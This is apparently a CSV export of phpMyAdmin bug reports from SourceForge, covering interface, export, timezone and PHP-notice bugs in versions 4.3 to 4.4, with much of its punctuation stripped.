I connect a lcd screen to my laptop and I expand my desktop for multiview 1920x1080 1280x720) if I then disconnect the lcd screen I have only low resolution on my laptop 1280x720) then phpmyadmin is not usable anymore, because the database navigation panel takes 100 of the browser I cannot adjust the border to the main border anymore even logout does not help I have to delete all cookies to get a useful seperation again Original URL https sourceforge.net p phpmyadmin bugs 4717 Original author schattenfell Found in version 4.3.7","bug"
"24444","11110","simulate query fails, but actual query does not.
I have a query which fails when using Simulate query .
When using Go , it properly executes.
The query UPDATE `pma column info` SET `transformation` = REPLACE REPLACE `transformation`, , ), inc.php , class.php ); It is a phpMyAdmin 4.3 update query from the manual.
And yes, I am really using single underline pma prefix.)
The error 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ) inc.php class.php ) FROM `pma column info` WHERE at line 1 Original URL https sourceforge.net p phpmyadmin bugs 4718 Original author ci dev Found in version 4.3.7","bug"
"24444","11111","No error message on Missing extension mbstring.
PHPMyAdmin on my Fedora does not start at all and gives 500 Internal Server Error on my browser console, though no error or message of any sort is shown on screen.
This problem was caused by php mbstring not being available, and resolved when I installed it, but shouldn t the system show some sort of error message about mb string not being installed, so the user knows what is wrong.
Using php 5.6.4 with apache, phpMyAdmin version 4.3.7 Original URL https sourceforge.net p phpmyadmin bugs 4720 Original author geekman rohit Found in version 4.3.7","bug"
"24444","11112","Incorrect width table summary when favorite tables is disabled.
Bug probably introduced in version 4.3.3 after applying https sourceforge.net p phpmyadmin bugs 4647 ).
In case favorite tables is disabled NumFavoriteTables=0), colspan of Sum is 7.
In this situation it should be 6.
Code applied in bug 4647 libraries structure.lib.php row 506 511 > Favorite table anchor.
> if GLOBALS[ cfg ][ NumFavoriteTables ] > 0) { > html output .= <td class= center > > .
PMA getHtmlForFavoriteAnchor db, current table, titles) > .
< td> ; > } Code colspan libraries structure.lib.php row 177 > Bug has to be fixed here > Note I added a space below < th) to make entire row visible in bug report) > html output .= < th colspan= .
db is system schema ?
4 7) .
> Suggested fix > sum colspan = db is system schema ?
4 7); > if GLOBALS[ cfg ][ NumFavoriteTables ]==0) > sum colspan ; > Note I added a space below < th) to make entire row visible in bug report) > html output .= < th colspan= .
sum colspan .
> I can only test db is system schema=false situation, but code shows in situation db is system schema=true only 3 columns browse, structure, search) are appended to HTML output.
Original URL https sourceforge.net p phpmyadmin bugs 4722 Original author alexkamp Found in version 4.3.7","bug"
"24444","11113","cfg[ NavigationTreeDefaultTabTable ] documentation has 2 entries.
In the documentation for the configuration of the Navigation panel setup, there are 2 entries for cfg[ NavigationTreeDefaultTabTable ], the second one with null as defaut value seems to be incorrect.
Original URL https sourceforge.net p phpmyadmin bugs 4723 Original author pbulat Found in version Latest Git","bug"
"24444","11114","checks missing before using variables from sessionStorage.
From Alexander Kamp s comment on https sourceforge.net p phpmyadmin bugs 4710 You can question yourself the way parts of the navigation pane are saved temporary.
Generated HTML can be a risk when you don t verify it the next time you use it.
tested by adjusting variables > it injects code into page).
Maybe rebuilding from JSON data or add hash check is an option.
Original URL https sourceforge.net p phpmyadmin bugs 4725 Original author atul5 Found in version 4.3.7","bug"
"24444","11115","Collation column missing in database list when DisableIS is true.
Original URL https sourceforge.net p phpmyadmin bugs 4727 Original author madhuracj Found in version 4.3.0","bug"
"24444","11116","Display original field when using Relational display column option and Choose column to display is empty.
When using Relational display column option with a FK on a table that doesn t define Choose column to display , the column linked to this table is empty.
In this case, I think that we should display the FK value.
Original URL https sourceforge.net p phpmyadmin bugs 4729 Original author tithugues Found in version 4.3.8","bug"
"24444","11117","some databases not showing.
I have 22 databases but only 16 show in left panel and 4 in right.
Was ok 4.3.7 Original URL https sourceforge.net p phpmyadmin bugs 4732 Original author zanzibarneon Found in version 4.3.8","bug"
"24444","11118","config parameter only db ignored.
The config parameter only db does not have effect since version 4.3.7 cfg[ Servers ][ i][ only db ] = array herwales cpat , herwales cpatt , herwales cpats , herwales cpatwork , herwales log , herwales issues , herwales map , herwales common ); Original URL https sourceforge.net p phpmyadmin bugs 4733 Original author zanzibarneon Found in version 4.3.8","bug"
"24444","11119","Default values for binary fields do not support binary values.
I have a 16 byte BINARY field I use for storing md5 hashes as it takes half the space of the text based hex equivalent) and read and write to it using HEX and UNHEX functions, which all works fine.
I have a problem setting the default value of the field in phpmyadmin because it doesn t seem to support the necessary syntax for binary values.
An empty BINARY type is filled with \0 null) chars, but I can t enter that as a default value.
It would be \0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 in normal CLI syntax, and mysql also supports two other formats 0x00000000000000000000000000000000 ODBC standard) and x 00000000000000000000000000000000 SQL standard), however, none of these work in phpmyadmin in the default value box.
It would perhaps be good to map a simple 0 to a full set of null bytes as the default value.
All of these work correctly in the CLI, none in phpmyadmin CREATE TABLE s c BINARY 16) default \0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 ); CREATE TABLE t c BINARY 16) default 0x00000000000000000000000000000000); CREATE TABLE u c BINARY 16) default x 00000000000000000000000000000000 ); and all show like this in show create table with my defaults) CREATE TABLE `u` `c` binary 16) DEFAULT \0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 ) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4 unicode ci I m running latest git 4.4.0 dev from Jan 26 2015.
Original URL https sourceforge.net p phpmyadmin bugs 4734 Original author coolbru Found in version 4.3.0","bug"
"24444","11120","Floating menu bar appears on top of jQuery dialogs.
Try editing a routine.
Original URL https sourceforge.net p phpmyadmin bugs 4735 Original author madhuracj Found in version Latest Git","bug"
"24444","11121","Header lose align when scrolling in Firefox v35.
Im attaching a screenshot,Im using Ubuntu 14.10 64bits uptodate and the last phpmyadmin version 4.3.8, when you go to see the rows in some long table, you need to do scroll when its happen all the columns headers are wrong, like you can see in image, like all column headers move 1 column to left.
Only found this bug in FF not in Chrome over the same platform.
Original URL https sourceforge.net p phpmyadmin bugs 4738 Original author mlacunza Found in version 4.3.8 Attachment http sourceforge.net p phpmyadmin bugs 4738 attachment localhost localhost ajeperu tbcfa categories phpMyAdmin 4.3.8 2015 01 27 09.15.13.png","bug"
"24444","11122","Make index editor work without the Ajax dialog.
This situation would arise if some one right click on the edit anchor and try open in a new tab Original URL https sourceforge.net p phpmyadmin bugs 4739 Original author madhuracj Found in version 4.3.0","bug"
"24444","11123","in .
libraries Advisor.class.php 184 vsprintf ) Too few arguments.
Hi, On fresh install PHP 5.6.5, Gentoo) Advisor returns with Warning in .
libraries Advisor.class.php 184 vsprintf ) Too few arguments Backtrace .
libraries Advisor.class.php 184 vsprintf string Tabela doxc5x82xc4x85cza xc5x9brednixc4x85 s, wartoxc5x9bxc4x87 ta powinna byxc4x87 mniejsza nixc5xbc 1 na godzinxc4x99 , array, ) .
libraries Advisor.class.php 237 Advisor >translate string Rate of reading first index entry ) .
libraries Advisor.class.php 137 Advisor >addRule string fired , array, ) .
libraries Advisor.class.php 58 Advisor >runRules ) .
libraries server status advisor.lib.php 60 Advisor >run ) .
server status advisor.php 34 PMA getHtmlForAdvisor ) It seems, polish translation needs to be fixed ;) Regards, Kamil Original URL https sourceforge.net p phpmyadmin bugs 4741 Original author kamilkaminski Found in version 4.3.8","bug"
"24444","11124","CSV export of query result fails with I think) name problem.
Can t export query results if the first named item in the FROM clause isn t a table.
For example SELECT stuff) FROM {OJ query} JOIN tables) tc.
Since, presumably, the only thing that is reqd for is to make up an export name, this seems a strange fault.
Original URL https sourceforge.net p phpmyadmin bugs 4742 Original author markstanton Found in version 4.3.6","bug"
"24444","11125","Unable to move cursor with keyboard in filter rows box.
Cannot move cursor or select text with shift arrow keys in the filter rows text box while browsing table.
Original URL https sourceforge.net p phpmyadmin bugs 4743 Original author nisargjhaveri Found in version 4.3.8","bug"
"24444","11126","Opening console scrolls down the page.
Opening console either with the shortcut ctrl alt C) or by clicking on console button makes the page scroll down.
This is reproducible in Google Chrome 39 on Ubuntu 14.04.
Doesn t happen with Firefix 35.
Original URL https sourceforge.net p phpmyadmin bugs 4744 Original author nisargjhaveri Found in version 4.3.8","bug"
"24444","11127","Tracking does not handle views properly.
When enabling tracking for views it is not offered to track create view, alter view and drop view statements Original URL https sourceforge.net p phpmyadmin bugs 4745 Original author madhuracj Found in version 4.3.0","bug"
"24444","11128","Right aligned columns have left aligned header.
At least in the browser, columns with right aligned values have a left aligned header.
IMO this isn t right.
Original URL https sourceforge.net p phpmyadmin bugs 4746 Original author olafvdspek Found in version 4.3.9","bug"
"24444","11129","Can t insert arbitary values when field has a relation.
When a field has a relation, a dropdown is presented when inserting values.
This might be handy, but sometimes you want to be able to insert an arbitary values.
Original URL https sourceforge.net p phpmyadmin bugs 4747 Original author olafvdspek Found in version 4.3.9","bug"
"24444","11130","Zeroconf PMA support should be per DB.
The Zeroconf PMA DBs were supposed to be per DB, not global.
It seems they re global though.
Original URL https sourceforge.net p phpmyadmin bugs 4749 Original author olafvdspek Found in version 4.3.8","bug"
"24444","11131","Disable renaming referenced columns.
MySQL prior to 5.6.6 does not allow renaming columns that are referenced by other columns.
Original URL https sourceforge.net p phpmyadmin bugs 4750 Original author madhuracj Found in version 4.3.0","bug"
"24444","11132","Saving user preferences does not work and opens the JSON response as page.
A fresh installation of phpMyAdmin 4.3.8 under Debian Jessie with MySQL 5.6.23 Community Edition manual installation), PHP 5.6.5 1 FPM) and Apache 2.4.10 9 with configured phpMyAdmin DB storage doesn t let me save any user preferences.
If I go to Settings > Features or any other tab) and click Apply, the JSON response is loaded as page and no setting was saved.
Happens with both Chrome 40 and IE 11.
Original URL https sourceforge.net p phpmyadmin bugs 4751 Original author smares Found in version 4.3.8","bug"
"24444","11133","pMA DB not detected properly?.
The The phpMyAdmin configuration storage is not completely configured, some extended features have been deactivated.
Find out why.
Or alternately go to Operations tab of any database to set it up there.
error is shown on home even though I ve got pMA tables in one of the DBs via ZeroConf).
It seems to not detect this until I visit this DB.
Original URL https sourceforge.net p phpmyadmin bugs 4754 Original author olafvdspek Found in version 4.3.9","bug"
"24444","11134","Undefined variable server slave status.
Notice in .
.. .. .. usr share phpmyadmin db structure.php 214 Undefined variable server slave status Notice in .
.. .. .. usr share phpmyadmin db structure.php 351 Undefined variable server slave status Notice in .
.. .. .. usr share phpmyadmin db structure.php 374 Undefined variable server slave status Notice in .
.. .. .. usr share phpmyadmin db structure.php 391 Undefined variable server slave status Original URL https sourceforge.net p phpmyadmin bugs 4755 Original author olafvdspek Found in version 4.3.9","bug"
"24444","11135","Illegal string offset token .
Warning in .
libraries url generating.lib.php 196 Illegal string offset token Backtrace .
.. .. .. usr share phpmyadmin sql.php 62 PMA URL getCommon string ipt ) Warning in .
libraries url generating.lib.php 203 http build query ) Parameter 1 expected to be Array or Object.
Incorrect value given Backtrace .
libraries url generating.lib.php 203 http build query string dpt , string , string , ) .
.. .. .. usr share phpmyadmin sql.php 62 PMA URL getCommon string ipt ) Original URL https sourceforge.net p phpmyadmin bugs 4756 Original author olafvdspek Found in version 4.3.9","bug"
"24444","11136","Error Token mismatch.
The More settings link at home contains a double ?
like prefs manage.php?
?token= If I ctrl click it, it works fine but if I just click on it it throws a Token mismatch error.
Original URL https sourceforge.net p phpmyadmin bugs 4757 Original author olafvdspek Found in version 4.3.9","bug"
"24444","11137","Firefox with auth type to http with multiple server doesn t work anymore.
Hi, I just upgrade to phpmyadmin 4.3.9 and something seem not working about changing server when we have them configured with auth type= http with firefox I have 3 servers configured like that, when I log on on the first server everything going well, but when I m trying to go on the second server, it ask me the user password and i m able to log on, but when I try to go on any table I got this message to display this page, firefox must send information that will repeat any action [...] and I see the server changed back to my first server at the back.
Original URL https sourceforge.net p phpmyadmin bugs 4758 Original author jfdionne Found in version 4.3.9","bug"
"24444","11138","quick database search doesn t work.
i have about 5000 databases the filter field in navigation pane on top doesn t work i type db name in the field and usually nothing happens when i hit f5 and type in the same thing, result appears so i guess some js issue chrome) p.s.
instead of 1 result found it would be nice to display the result directly thanks Original URL https sourceforge.net p phpmyadmin bugs 4759 Original author freeman3 Found in version 4.3.8","bug"
"24444","11139","Cannot re import settings from local storage.
Saving user preferences to local storage and importing back gives 1364 Field timevalue doesn t have a default value .
Database was configured using create tables.sql.
Original URL https sourceforge.net p phpmyadmin bugs 4760 Original author smares Found in version 4.3.9","bug"
"24444","11140","After database creation, go to database structure page.
After creating a new database, we should go to that database structure page.
See [4752] https sourceforge.net p phpmyadmin bugs 4752 ) and http wiki.phpmyadmin.net pma 2015 02 Meeting IRC Log Original URL https sourceforge.net p phpmyadmin bugs 4761 Original author ibennetch Found in version 3.3.7","bug"
"24444","11141","database export with more then cca 512 tables fails.
When trying to export database with 543 tables, the export fails and moreover is followed by immediate logout, so its not possible to even report it using default ajax settings ask).
When I select less then approx.
500 tables, the export works ok so the number 512 is educated guess.
Default export settings used.
PMA versions affected 4.3.0 4.3.9 PMA versions not affected 4.2.13.1 and presumably older Server software MySQL 5.5.34, IIS 7.5, PHP 5.4.37 php max input vars = 1000 Original URL https sourceforge.net p phpmyadmin bugs 4763 Original author pavelxk Found in version 4.3.9 Attachment http sourceforge.net p phpmyadmin bugs 4763 attachment error PMA WP export 2.png","bug"
"24444","11142","Undefined index navwork.
.
Original URL https sourceforge.net p phpmyadmin bugs 4764 Original author spartakusmd Found in version 4.3.9","bug"
"24444","11143","Exporting tables from within a DB produces create database code.
This is a regression.
if this has been done by design, it s a wrong design) Steps to reproduce select a database go to Export.
Note that the title in the page reads Exporting TABLES from <database name> Go with the quick export, or select Custom and go NOTE this is not the same as going to Home, then Export, and select a one or more whole databases to export.
Expected The exported .sql at least by default) should NOT contain the create database and use statements, because we are exporting tables from within a database.
It is supposed to export only tables with or without data), so that they can be imported into a database of any name.
This is how it used to work In the Custom section there s no option to choose whether or not to include the Create database statement, hence it should either NOT include it, or there should be an option for that, disabled by default.
Observed The exported .sql file contains create database and use statements, with the name of the database.
This means that the following won t work enter a database export its tables enter another database import the tables you exported => epic fail it will import them to the original database or to a new database of the same name as the original if you are importing to a different server), and not into the database into which you are supposed to be importing.
This is a HUGE regression Original URL https sourceforge.net p phpmyadmin bugs 4765 Original author teo8976 Found in version 4.0.4","bug"
"24444","11144","[SOURCEFORGE PROJECT] Use unambiguous values for Priority.
It s been AGES since people have stopped using numerical values such as 1..9 for priority in bugtrackers because it s ambiguous you never know whether 1 is supposed to be the highest or lowest priority, as both conventions have historically been used.
Modern decent bugtrackers use unambiguous values such as high , low , etc.
I thought this was an issue in SourceForge but as I reported it in https sourceforge.net p forge feature requests 380 they replied Greetings, every field is fully customizable, so if you don t like it ask to phpMyAdmin administrators to change it.
Please do so.
Original URL https sourceforge.net p phpmyadmin bugs 4766 Original author teo8976 Found in version 4.3.9","bug"
"24444","11145","Drizzle undefined index in mysql charsets.inc.php.
On the Drizzle demo server, I get this notice when entering the first database <pre>Notice in .
libraries mysql charsets.inc.php 46 Undefined index utf8 general ci Backtrace .
db structure.php 75 require once .
libraries mysql charsets.inc.php)< pre> Original URL https sourceforge.net p phpmyadmin bugs 4767 Original author ibennetch Found in version 3.4.7","bug"
"24444","11146","Multiple delete on table browse ignoring foreign key checkbox.
In multiple table rows delete from browse tab.
When on delete confirmation page, Yes button next to Do you really want to execute the following query?
is clicked does not submit foreign key checkbox status.
== Steps to reproduce == 1.
Browse a table 2.
Select multiple rows 3.
Click With Selected delete button 4.
Click Yes next to Do you really want to execute the following query?
5.
Inspect the sent form parameters using firebug or other debugging tool.
Original URL https sourceforge.net p phpmyadmin bugs 4770 Original author chirayu45 Found in version Latest Git","bug"
"24444","11147","Central Columns not working, showing error.
I can successfully create a central column, but while trying to browse them I see the following error Notice in .
libraries central columns.lib.php 98 Undefined offset 0 Backtrace .
db central columns.php 73 PMA getCentralColumnsCount string my database name ) Original URL https sourceforge.net p phpmyadmin bugs 4771 Original author peku33 Found in version 4.3.9","bug"
"24444","11148","Problem in adding single column to central columns.
Hi, Whenever I try to add a column to central column using More under the Action header in table structure then error is shown of No Column Selected .This is encountered in Master Branch.It works fine in QA branch.
Original URL https sourceforge.net p phpmyadmin bugs 4772 Original author rakeshkaundilya Found in version Latest Git","bug"
"24444","11149","Trying to create new table results in 500 Internal Server Error.
When I click the New link below the table name in the left panel, I get this error Error in Processing Request Error code 500 Error text Internal Server Error The same happens when I m on the Database overview page and try to create a new table from the Create table box at the bottom.
It first happened as a user without the required permissions, but the same thing happened as root as well.
I was able to create the table using raw SQL with CREATE TABLE... so it can t be a permissions issue.
Using PMA 4.3.9, PHP 5.4, MySQL 5.6, Microsoft IIS 7.5.
Original URL https sourceforge.net p phpmyadmin bugs 4773 Original author svivian Found in version 4.3.9","bug"
"24444","11150","SQL links are completely wrong.
When I run any query, the box near the top of the page adds links to certain keywords like SELECT and IN .
But these links are complete gobbledygook.
SELECT http example.com pma url.php?url=http 3ANANNANdev.mysql.comNANdocNANrefmanNAN5.5NANenNAN 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20undefined.html IN http example.com pma url.php?url=http 3ANANNANdev.mysql.comNANdocNANrefmanNAN5.5NANenNAN 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20undefined.html function in Using PMA 4.3.9, PHP 5.4, MySQL 5.6, Microsoft IIS 7.5.
Original URL https sourceforge.net p phpmyadmin bugs 4774 Original author svivian Found in version 4.3.9","bug"
"24444","11151","array unshift warnings in RecentFavoriteTable.class.php.
Around line 285 in RecentFavoriteTable.class.php throws lots of warnings every time you choose a table because this > tables is not an array but NULL.
Simple workaround Add is array this > tables) ...) to the if condition, but I guess the real reason for the problem is somewhere else.
Original URL https sourceforge.net p phpmyadmin bugs 4775 Original author nobs Found in version 4.3.10","bug"
"24444","11152","HHVM MySQLi errors.
4.1.0rc 1 version .
HHVM hphp invoke ) can reproduce in latest stable Original URL https sourceforge.net p phpmyadmin bugs 4776 Original author r3wt Found in version 3.4.7","bug"
"24444","11153","Some images are missing in Designer for original theme.
Original URL https sourceforge.net p phpmyadmin bugs 4777 Original author madhuracj Found in version 4.3.0","bug"
"24444","11154","PMA Util parseEnumSetValues fails on enums with UTF 8 values.
PMA Util parseEnumSetValues ) seems to handle enum ) type definitions with non Latin1 values incorrectly, leading to a truncated drop down field at the Insert record page some valid ENUM values not shown).
How to reproduce CREATE TABLE `test enum` `x` enum xd0xbexd0xb4xd0xb8xd0xbd , xd0xb4xd0xb2xd0xb0 , xd1x82xd1x80xd0xb8 , xd1x87xd0xb5xd1x82xd1x8bxd1x80xd0xb5 )) On table structure page the correct field definition is shown, and Edit ENUM SET values popup shows all the values.
On Insert page for the test enum table however drop down for x field show truncated set of elements the first three of them in this case).
As I traced this error the source of it is PMA Util parseEnumSetValues ) method it uses mb strlen ) call to determine the length of the enum ...) string which is multi byte in this case, and then iterates over individual single byte characters, effectively truncating the output.
var dump values string) after htmlentities ) call at the top of PMA Util parseEnumSetValues ) string 49) enum xd0xbexd0xb4xd0xb8xd0xbd , xd0xb4xd0xb2xd0xb0 , xd1x82xd1x80xd0xb8 , xd1x87xd0xb5xd1x82xd1x8bxd1x80xd0xb5 ) var dump values) before return from PMA Util parseEnumSetValues ) array 3) { [0]=> string 8) xd0xbexd0xb4xd0xb8xd0xbd [1]=> string 6) xd0xb4xd0xb2xd0xb0 [2]=> string 6) xd1x82xd1x80xd0xb8 } xd1x87xd0xb5xd1x82xd1x8bxd1x80xd0xb5 gets truncated from the output) Original URL https sourceforge.net p phpmyadmin bugs 4779 Original author macloue Found in version 4.3.10","bug"
"24444","11155","Notice when timestamp column does not have default value.
Following notice is thrown at insert page when timestamp column does not have a default value.
Notice in .\libraries\Util.class.php 3704 Undefined index default value Backtrace .\libraries\Util.class.php 3734 PMA Util getDefaultFunctionForField array, boolean true, ) .\libraries\insert edit.lib.php 406 PMA Util getFunctionsForField array, boolean true, ) .\libraries\insert edit.lib.php 2765 PMA getFunctionColumn array, boolean true, string [multi edit][1][8fa14cdd754f91cc6554c9e71929cce7] , string onchange= return verificationsAfterFieldChange \ 8fa14cdd754f91cc6554c9e71929cce7\ , \ 1\ ,\ timestamp 2)\ ) , array, integer 3000, integer 7, integer 7, boolean true, ) .\libraries\insert edit.lib.php 2917 PMA getHtmlForInsertEditFormColumn array, integer 2, array, array, boolean false, object, string onchange , integer 1, string [multi edit][1] , boolean true, array, boolean true, integer 2, integer 8, integer 4, boolean true, integer 3000, array, integer 6000, integer 0, string table1 , string world , integer 1, array, integer 0, string input , string ltr , array, array, string , ) .\tbl change.php 198 PMA getHtmlForInsertEditRow array, array, array, array, boolean false, object, string onchange , integer 1, string [multi edit][1] , boolean true, array, integer 2, integer 8, integer 4, boolean true, integer 3000, array, integer 6000, integer 0, string table1 , string world , integer 1, array, integer 0, string ltr , array, array, ) Original URL https sourceforge.net p phpmyadmin bugs 4780 Original author madhuracj Found in version 4.3.0","bug"
"24444","11156","Sticky column top alignment broken on horizontal scroll.
In table Browse, when columns are wide enough to use the horizontal scrollbar, the sticky columns top alignment is wrong on horizontal scroll..
Introduced in b1ab5e3e5b0b Original URL https sourceforge.net p phpmyadmin bugs 4782 Original author atul5 Found in version Latest Git","bug"
"24444","11157","Incomplete bookmark saving.
It is not possible to save big query as bookmark.
If you have query of 20 lines multiple INSERTS,UPDATES delimited by ;), and try to bookmark it, it will break it and save only last 2 3 lines.
In version 4.2.13.1 it all works.
Original URL https sourceforge.net p phpmyadmin bugs 4784 Original author derados Found in version 4.3.11","bug"
"24444","11158","SELECT width on relations page.
Fixes https github.com phpmyadmin phpmyadmin commit 7934919b9edcc1e54aa204157a7f005b47a2e2e4 https github.com phpmyadmin phpmyadmin commit 3f62197019975e7f0928b9724b6452a29899bbb0 Original URL https sourceforge.net p phpmyadmin bugs 4786 Original author greenpeas26 Found in version 4.3.11 Attachment http sourceforge.net p phpmyadmin bugs 4786 attachment pma1600px.png","bug"
"24444","11159","If mysql server default timezone is not set by default), Phpmyadmin export wrong timestamp and timezone combination.
Bug Report Brief, in debian 6 7 if mysql server default timezone is not set, Phpmyadmin export wrong timestamp and timezone combination in sql result.
The problem can be recreated,below is steps to recreate it Env phpmyadmin Version information 4.3.11 up to date) debian 6 7 64bit Brief If mysql server default timezone is not set, Phpmyadmin export wrong timestamp offset) in sql result.
How to recreate problem as below =================== php time zone is set on asia shanghai 08 00) Php script to store date and time to mysql timestamp columne What is recorded as 2015 03 04 23 59 37 in timestamp col you can also manually input the value from phpmyadmin, the field must be defined timestamp format) and it is stored correctly in mysql with correct timezone.
The problem is after exporting from phpmyadmin pma) Problematic Senario 1 if not set default time zone of mysql my.cnf use default) if dun set default time zone of mysql my.cnf, mysql timezone by default equals to debian SYSTEM timezone 08 00), Display The Pma displayed record as 2015 03 04 23 59 37 correct.
it use default debian systemtimezone to display time correctly.
If use mysqldump to export the mysqldump result, !40103 SET TIME ZONE= 00 00 ; 2015 03 04 15 59 37 , so mysqldump result is correct also, but if pma export sql, it contains SET time zone = 00 00 ; and 2015 03 04 23 59 37 which is wrong exported output.
the correct exported content shall be SET time zone = 00 00 ; and 2015 03 04 15 59 37 , or SET time zone = 08 00 ; and 2015 03 04 23 59 37 if import back this wrongly exported sql quoted again SET time zone = 00 00 ; and 2015 03 04 23 59 37 ), the stored record in pma will be displayed totally differently from the beginning.
because it treate 23 59 37 as timezone of 00 00, not 08 00 it seems the phpmyadmin does not catch the default time zone of mysql which is transferred from debian System.
Test Senario 2 as reference only,to troubleshoot where maybe wrong) A If mysql server set default time zone 00 00 in my.cnf , pma export 2015 03 04 15 59 37 , correct.
B If mysql my.cnf is set default time zone 08 00, pma display 2015 03 04 23 59 37 , correct.
If phpmyadmin export, it contains set time zone 00 00, 2015 03 04 15 59 37 , that is also correct, because mysql default time zone is 08 00, but phpmyadmin all use 00 00, to do the export, anyway, it is still right, even though it only export with 00 00 format Analysis The problem seems only occured when mysql my.cnf does not set default time zone using default setting in debian) it seems during exporting, the phpmyadmin does not catch the default time zone of mysql which is transferred from debian System.
recap The problem in debian 6 7 if mysql server default timezone is not set, Phpmyadmin export wrong timestamp and timezone combination in sql result.
Temp walk around set default time zone in mysql my.cnf Original URL https sourceforge.net p phpmyadmin bugs 4787 Original author aaronyu6 Found in version Latest Git","bug"
"24444","11160","Views aren t dropped when copying a database.
I m using Ubuntu 14.04 s latest version of phpmyadmin, 4.0.10deb1.
When I choose to copy a database to an existing database and include Add DROP TABLE DROP VIEW , it doesn t drop views and fails due to the view already existing.
Original URL https sourceforge.net p phpmyadmin bugs 4789 Original author steven jackson Found in version 4.3.0","bug"
"24444","11161","DROP TABLE VIEW IF EXISTS are not tracked.
Original URL https sourceforge.net p phpmyadmin bugs 4790 Original author madhuracj Found in version 4.3.0","bug"
"24444","11162","Zoom search js error.
Reproduce open a table, Search, Zoom search.
Introduced by https github.com phpmyadmin phpmyadmin commit 80f4bb978283bed1c54b6cdb649279e03f054d00 Original URL https sourceforge.net p phpmyadmin bugs 4791 Original author lem9 Found in version 4.4.0","bug"
"24444","11163","Saving page in Designer input title is undefined .
I opened a database in Designer.
When I saved the position of tables at the first time the label of the input was undefined .
Additionally the popup had no title.
After that I opened another db in Designer and at saving the label and popup title were correct Page name Save page).
I think the menu item for saving the page should also be Save page instead of Save position because of the it saves everything position, relation arrows, etc.).
Apache 2.2.17 Win32) mod ssl 2.2.17 OpenSSL 0.9.8o PHP 5.3.4 mod perl 2.0.4 Perl v5.10.1 Database client version libmysql mysqlnd 5.0.7 dev 091210 Revision 304625 PHP extension mysqli PHP version 5.3.5 Original URL https sourceforge.net p phpmyadmin bugs 4792 Original author hellsing71 Found in version 4.4.0","bug"
"24444","11164","Positioning of sprites.png is faulty, icons are mixed up.
Some icons are mixed because positioning of sprites.png is faulty.
Upper left corner the home icon looks like a table and is the same as new table icon.
The icon of documentation is a small house eg.
on Web Server and Appearance Settings panels).
I think it should be a question mark.
On the left side panel of dbs and tables, a small red [S] icon appears for hiding a table.
I think the light bulb icons of sprites.png should be here.
When browsing a database a forward icon stg.
like >>) apperas to copy function.
I don t know if it s faulty or not but somehow I can t connect the >> icon to the copy function.
Original URL https sourceforge.net p phpmyadmin bugs 4793 Original author hellsing71 Found in version 4.4.0","bug"
"24444","11165","Server error viewing table content.
When I click on any table name on the left side panel to view its contents I always get this error mesage Some errors have been detected on the server!
Please look at the bottom of this window.
I checked the console on the bottom of the page and all I can find there is the simple SQL query SELECT FROM foo .
Can t find explanation of the error there.
On the middle of the page where the table of contents should appear) the data coming from the server is unformatted and I found this message there Notice in .\libraries\DisplayResults.class.php 2738 Undefined property stdClass db If I click on popup s Ignore button the content reloads well formatted without any problem.
If I choose a new table to view I get the error message again.
Original URL https sourceforge.net p phpmyadmin bugs 4794 Original author hellsing71 Found in version 4.4.0","bug"
"24444","11166","Query builder missing joint for the intermediary table.
Defining a Relation view does join tables by the relations defined when using the query builder but then you have three tables like x,y and z that are connected as x >y and y >z and you only display x and z no join occurs, it should join the middle table for joining the 2 tables together....
Original URL https sourceforge.net p phpmyadmin bugs 4795 https sourceforge.net p phpmyadmin bugs 4795 Original author anonymous Found in version 4.4.3","bug"
"24444","11167","Add Close on re click to Options tab button of Console.
Hi, As per the current master towards 4.5), the Console tab of Bookmark opens and closes on clicking on again pma bookmarks the button named Bookmarks ) but the Options tab doesn t behave in the same way.
i.e.
it opens when clicked on the pma console options the button named Options ) but can not be closed in the same way, but only by clicking on area inside Console and outside the tab.
Hope the screenshots makes it more clear.
Bookmark.png works while Options.png doesnot close the tab.
I think we should add the functionality of closing by clicking on the button again to the Options tab too.
It will improve the usability.
Original URL https sourceforge.net p phpmyadmin bugs 4796 Original author deven bansod Found in version 4.3.11 Attachment http sourceforge.net p phpmyadmin bugs 4796 attachment Bookmark.png Attachment http sourceforge.net p phpmyadmin bugs 4796 attachment Options.png","bug"
"24444","11168","Inline edit of DATETIME fields, can t change month nor time.
1.
Double click on the datetime field 2. a datepicker with sliders for the time opens 3. click on the little arrows for the month changing > month is not changed 4. try sliding any of the sliders > slider handle does not move CREATE TABLE IF NOT EXISTS `test` `ID` int 11) NOT NULL, `datetime` datetime NOT NULL ) ENGINE=InnoDB AUTO INCREMENT=2 DEFAULT CHARSET=latin1; INSERT INTO `test` `ID`, `datetime`) VALUES 1, 2015 03 12 11 30 00 ); ALTER TABLE `test` ADD PRIMARY KEY `ID`); ALTER TABLE `test` MODIFY `ID` int 11) NOT NULL AUTO INCREMENT,AUTO INCREMENT=2; Original URL https sourceforge.net p phpmyadmin bugs 4797 Original author rm km it Found in version Latest Git","bug"
"24444","11169","Missing column when exporting in sql.
Bug while exporting as sql a drupal 8 database structure part), a column is missing in the export.
Works fine on phpMyAdmin 4.0.10.9 english and bug at least since phpMyAdmin 4.2.13.2 english.
Tested also on phpMyAdmin 4.3.11.1 all languages and phpMyAdmin 4.4.0 beta1 all languages and the 4.2.0 embedded in the MAMP project.
On table key value , instead of building this Table structure for table `key value` CREATE TABLE IF NOT EXISTS `key value` `collection` varchar 128) NOT NULL DEFAULT COMMENT A named collection of key and value pairs.
, `name` varchar 128) NOT NULL DEFAULT COMMENT The key of the key value pair.
As KEY is a SQL reserved keyword, name was chosen instead.
, `value` longblob NOT NULL COMMENT The value.
, PRIMARY KEY `collection`,`name`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT= Generic key value storage table.
See the state system for ; ...it builds this Table structure for table `key value` CREATE TABLE IF NOT EXISTS `key value` `collection` varchar 128) NOT NULL DEFAULT COMMENT A named collection of key and value pairs.
`value` longblob NOT NULL COMMENT The value.
, PRIMARY KEY `collection`,`name`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT= Generic key value storage table.
